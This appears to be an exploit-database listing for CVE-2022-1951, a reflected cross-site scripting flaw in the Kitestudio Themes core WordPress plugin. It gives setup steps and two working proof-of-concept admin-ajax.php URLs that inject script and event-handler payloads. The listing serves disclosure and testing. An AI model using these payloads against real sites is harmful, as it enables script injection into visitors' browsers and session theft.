Exploit for Core Plugin for Kitestudio Themes < 2.3.1 - Reflected Cross-Site-Scripting CVE-2022-1951

Name: Exploit for Core Plugin for Kitestudio Themes < 2.3.1 - Reflected Cross-Site-Scripting CVE-2022-1951
Rating: 5 (75 reviews)

2022-06-15 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:F56F7244-E8EC-4A87-9419-643BC13B45A0
Install and active the dependencies: a premium theme (or the teta-lite one), as well as the WooCommerce plugin, then open the below URL as either an unauthenticated or authenticated user

v < 2.3 - https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&atts[body_class]=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

v < 2.3.1 (will only works against unauthenticated users as a nonce is needed) - https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&kite_nonce=xxxxx&atts[body_class]=%22onmouseover=alert(/XSS/)//